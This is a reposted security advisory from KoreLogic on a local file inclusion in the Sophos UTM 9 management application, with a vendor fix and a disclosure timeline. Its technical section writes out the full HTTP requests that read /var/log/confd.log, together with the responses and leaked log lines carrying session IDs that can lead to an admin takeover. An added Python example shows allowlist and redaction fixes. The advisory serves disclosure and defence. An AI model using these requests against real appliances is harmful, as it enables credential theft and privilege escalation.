Sophos UTM 9 Management Application Local File Inclusion

2017-10-25T00:00:00
ID PACKETSTORM:144753
Type packetstorm
Reporter Matthew Bergin
Modified 2017-10-25T00:00:00

Description

                                        
                                            `KL-001-2017-021 : Sophos UTM 9 Management Appplication Local File Inclusion  
  
Title: Sophos UTM 9 Management Application Local File Inclusion  
Advisory ID: KL-001-2017-021  
Publication Date: 2017.10.24  
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-021.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Sophos  
Affected Product: UTM 9  
Affected Version: 9.410  
Platform: Embedded Linux  
CWE Classification: CWE-538: File and Directory Information Exposure,  
CWE-264: Permissions, Privileges, and Access Controls,  
CWE-532: Information Exposure Through Log Files  
Impact: Information Disclosure  
Attack vector: HTTP  
  
2. Vulnerability Description  
  
Any user who has log viewing rights provisioned can read  
arbitrary files from the local filesystem as a limited-privilege  
user. This can be used to read the confd log file and obtain  
root-privilege SID values.  
  
3. Technical Description  
  
Any user who has permission to access the 'Logging & Reporting'  
functionality within the management application can read  
arbitrary files.  
  
POST /webadmin.plx HTTP/1.1  
Host: 1.3.3.7:4444  
Accept-Language: en-US,en;q=0.5  
X-Requested-With: XMLHttpRequest  
X-Prototype-Version: 1.5.1.1  
Content-Type: application/json; charset=UTF-8  
Content-Length: 313  
Cookie: SID=SoCKGdoKFmeobxZTEWDz  
DNT: 1  
Connection: close  
  
{"objs": [{"filename": "/var/log/confd.log", "FID": "log_download_single"}], "SID": "SoCKGdoKFmeobxZTEWDz", "browser":  
"gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID":  
"1491835733989_0.7813499665507969", "current_uuid": "189fb61e-e01b-11da-8017-0014221e9eba", "ipv6": false}  
  
HTTP/1.1 200 OK  
Date: Mon, 10 Apr 2017 07:49:51 GMT  
Server: Apache  
Expires: Thursday, 01-Jan-1970 00:00:01 GMT  
Pragma: no-cache  
X-Frame-Options: SAMEORIGIN  
X-Content-Type-Option: nosniff  
X-XSS-Protection: 1; mode=block  
Vary: Accept-Encoding  
Connection: close  
Content-Type: application/json; charset=utf-8  
Content-Length: 605  
  
{"SID":"SoCKGdoKFmeobxZTEWDz","ipv6":false,"current_uuid":"189fb61e-e01b-11da-8017-0014221e9eba","browser":"gecko","RID":"1491835733989_0.7813499665507969","js":"if($(\"topbar_icon\")){$(\"topbar_icon\").src=\"core/img/topbar/topbar_user.png\";}toggle_who_is_watching(0);","backend_version":"2","loc":"english","globals_data":["SoCKGdoKFmeobxZTEWDz"],"globals":["SID"],"objs":[{"current_uuid":"189fb61e-e01b-11da-8017-0014221e9eba","FID":"log_download_single","filename":"/var/log/confd.log","js":"start_download('var/SoCKGdoKFmeobxZTEWDz/downloads/singlelogfile/confd-debug.log');"}],"_cookie":null,"wdebug":0}  
  
The start_download() function is JavaScript loaded into the  
browser. This function takes the given parameter and uses it  
to build the subsequent HTTP GET request.  
  
GET /var/SoCKGdoKFmeobxZTEWDz/downloads/singlelogfile/confd-debug.log HTTP/1.1  
Host: 1.3.3.7:4444  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Referer: https://1.3.3.7:4444/  
Cookie: SID=SoCKGdoKFmeobxZTEWDz  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
HTTP/1.1 200 OK  
Date: Mon, 10 Apr 2017 07:51:02 GMT  
Server: Apache  
X-Frame-Options: SAMEORIGIN  
X-Content-Type-Option: nosniff  
X-XSS-Protection: 1; mode=block  
Cache-Control: max-age=31536000  
Expires: Tue, 10 Apr 2018 07:51:02 GMT  
Vary: Accept-Encoding  
Connection: close  
Content-Type: text/plain; charset=utf-8  
Content-Length: 2595127  
  
2017:04:02-00:00:01 hostname confd[28056]: D Role::authenticate:185() => id="3106" severity="debug" sys="System"  
sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="oLwZJzlZQcXRrgpDZtwv"  
facility="system" client="ips-reporter.pl" call="new"<31>Apr 2 00:00:01 confd[28056]: D sys::AUTOLOAD:303() =>  
id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1"  
facility="system" client="ips-reporter.pl" lock="none" method="get_SID"  
2017:04:02-00:00:01 hostname confd[28056]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd"  
name="external call" user="system" srcip="127.0.0.1" facility="system" client="ips-reporter.pl" lock="none"  
method="signal_unsubscribe"  
2017:04:02-00:00:01 hostname confd[28056]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd"  
name="external call" user="system" srcip="127.0.0.1" facility="system" client="ips-reporter.pl" lock="none" method="logout"  
2017:04:02-00:00:01 hostname confd[28056]: D Session::terminate:290() => id="3100" severity="debug" sys="System"  
sub="confd" name="closing session" user="system" srcip="127.0.0.1" sid="oLwZJzlZQcXRrgpDZtwv" facility="system"  
client="ips-reporter.pl" call="logout" function="logout"  
2017:04:02-00:00:01 hostname confd[28056]: D sys::DESTROY:231() => id="3100" severity="debug" sys="System" sub="confd"  
name="worker process exiting" user="system" srcip="127.0.0.1" facility="system" client="ips-reporter.pl"  
2017:04:02-00:00:01 hostname confd[28070]: D Role::authenticate:185() => id="3106" severity="debug" sys="System"  
sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="sJpVhmspOPKYYxNAcfEj"  
facility="system" client="spx-password-expire" call="new"<31>Apr 2 00:00:01 confd[28070]: D sys::AUTOLOAD:303() =>  
id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1"  
facility="system" client="spx-password-expire" lock="none" method="get_SID"  
2017:04:02-00:00:01 hostname confd[28070]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd"  
name="external call" user="system" srcip="127.0.0.1" facility="system" client="spx-password-expire" lock="none" method="get"  
2017:04:02-00:00:01 hostname confd[28070]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd"  
name="external call" user="system" srcip="127.0.0.1" facility="system" client="spx-password-expire" lock="none"  
method="logout"  
2017:04:02-00:00:01 hostname confd[28070]: D Session::terminate:290() => id="3100" severity="debug" sys="System"  
sub="confd" name="closing session" user="system" srcip="127.0.0.1" sid="sJpVhmspOPKYYxNAcfEj" facility="system"  
client="spx-password-expire" call="logout" function="logout"  
2017:04:02-00:00:02 hostname confd[28070]: D sys::DESTROY:231() => id="3100" severity="debug" sys="System" sub="confd"  
name="worker process exiting" user="system" srcip="127.0.0.1" facility="system" client="spx-password-expire"  
2017:04:02-00:00:01 hostname confd[28083]: D Role::authenticate:185() => id="3106" severity="debug" sys="System"  
sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="bgpZDQBWHcNGvvQKTjPj"  
facility="system" client="admin-reporter.pl" call="new"<31>Apr 2 00:00:02 confd[28083]: D sys::AUTOLOAD:303() =>  
id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1"  
facility="system" client="admin-reporter.pl" lock="none" method="get_SID"  
2017:04:02-00:00:01 hostname confd[28086]: D Role::authenticate:185() => id="3106" severity="debug" sys="System"  
sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="BXeDpxEvboHeDEmaaHEY"  
facility="system" client="vpnreporter" call="new"<31>Apr 2 00:00:02 confd[28086]: D sys::AUTOLOAD:303() => id="3100"  
severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system"  
client="vpnreporter" lock="none" method="get_SID"  
2017:04:02-00:00:01 hostname confd[28088]: D Role::authenticate:185() => id="3106" severity="debug" sys="System"  
sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="SBggtglcePoJTWtmkIMO"  
facility="system" client="websecreporter" call="new"<31>Apr 2 00:00:02 confd[28088]: D sys::AUTOLOAD:303() => id="3100"  
severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system"  
client="websecreporter" lock="none" method="get_SID"  
2017:04:02-00:00:02 hostname confd[28086]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd"  
name="external call" user="system" srcip="127.0.0.1" facility="system" client="vpnreporter" lock="none"  
method="signal_subscribe"  
2017:04:02-00:00:02 hostname confd[28083]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd"  
name="external call" user="system" srcip="127.0.0.1" facility="system" client="admin-reporter.pl" lock="none"  
method="signal_unsubscribe"  
2017:04:02-00:00:02 hostname confd[28088]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd"  
name="external call" user="system" srcip="127.0.0.1" facility="system" client="websecreporter" lock="none"  
method="signal_subscribe"  
2017:04:02-00:00:02 hostname confd[28083]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd"  
name="external call" user="system" srcip="127.0.0.1" facility="system" client="admin-reporter.pl" lock="none"  
method="logout"  
2017:04:02-00:00:02 hostname confd[28083]: D Session::terminate:290() => id="3100" severity="debug" sys="System"  
sub="confd" name="closing session" user="system" srcip="127.0.0.1" sid="bgpZDQBWHcNGvvQKTjPj" facility="system"  
client="admin-reporter.pl" call="logout" function="logout"  
...  
...  
  
The logging of 'sid' values is also dangerous because it  
leaks session identifiers that may belong to higher-privileged  
accounts. A 'sid' for the admin account can be used to change  
the root and loginuser passwords.  
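The advisory names two weaknesses: the log download handler accepts a filesystem path from the client, and the confd log records reusable session identifiers. The following is an added example (not KoreLogic's or Sophos's code) of the two server-side fixes a defender would want: an allowlist that maps opaque log names to fixed paths, and a redaction pass over log lines before they are handed out. The allowlist entries and the sample request body are constructed for illustration.

```python
import json
import os
import re

# Constructed allowlist: the client may only name a log, never supply a path.
# Real UTM log names are not given on the page; these entries are illustrative.
ALLOWED_LOGS = {
    "system": "/var/log/system.log",
    "httpproxy": "/var/log/http.log",
}

# Matches the sid="..." attribute as it appears in confd log lines.
SID_RE = re.compile(r'\bsid="([^"]*)"')


def resolve_log_request(body: str):
    """Return the on-disk path for a log_download_single request, or None
    when the request names anything outside ALLOWED_LOGS (paths included)."""
    req = json.loads(body)
    for obj in req.get("objs", []):
        if obj.get("FID") != "log_download_single":
            continue
        name = obj.get("filename", "")
        # A bare allowlisted name is the only acceptable form; anything with a
        # directory component (absolute path, traversal) is refused outright.
        if os.path.basename(name) != name or name not in ALLOWED_LOGS:
            return None
        return ALLOWED_LOGS[name]
    return None


def redact_sids(line: str) -> str:
    """Mask session identifiers so a downloaded log cannot yield live SIDs."""
    return SID_RE.sub(lambda m: 'sid="' + "*" * len(m.group(1)) + '"', line)


# Constructed request body in the shape the advisory shows (same FID field),
# asking for the confd log by absolute path; the handler above refuses it.
SAMPLE_REQUEST = json.dumps({
    "objs": [{"filename": "/var/log/confd.log", "FID": "log_download_single"}],
    "SID": "EXAMPLESIDNOTREAL000",
})

# Constructed confd-style log line carrying a session identifier.
SAMPLE_LOG_LINE = ('2017:04:02-00:00:01 hostname confd[28056]: D Role::authenticate:185() '
                   '=> name="authentication successful" user="system" '
                   'srcip="127.0.0.1" sid="oLwZJzlZQcXRrgpDZtwv" facility="system"')
```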
  
4. Mitigation and Remediation Recommendation  
  
The vendor has addressed this vulnerability in version 9.503. Release notes and download instructions can be found at:  
https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-503-released  
  
5. Credit  
  
This vulnerability was discovered by Matt Bergin (@thatguylevel)  
of KoreLogic, Inc.  
  
6. Disclosure Timeline  
  
2017.07.21 - KoreLogic submits vulnerability details to Sophos.  
2017.07.21 - Sophos acknowledges receipt.  
2017.09.01 - 30 business days have elapsed since the vulnerability  
was reported to Sophos.  
2017.09.15 - KoreLogic requests an update on the status of this  
and other vulnerabilities reported to Sophos.  
2017.09.18 - Sophos informs KoreLogic that this issue has been  
remediated in release 9.503 for UTM.  
2017.10.24 - KoreLogic public disclosure.  
  
7. Proof of Concept  
  
See 3. Technical Description.  
  
  
The contents of this advisory are copyright(c) 2017  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt  
  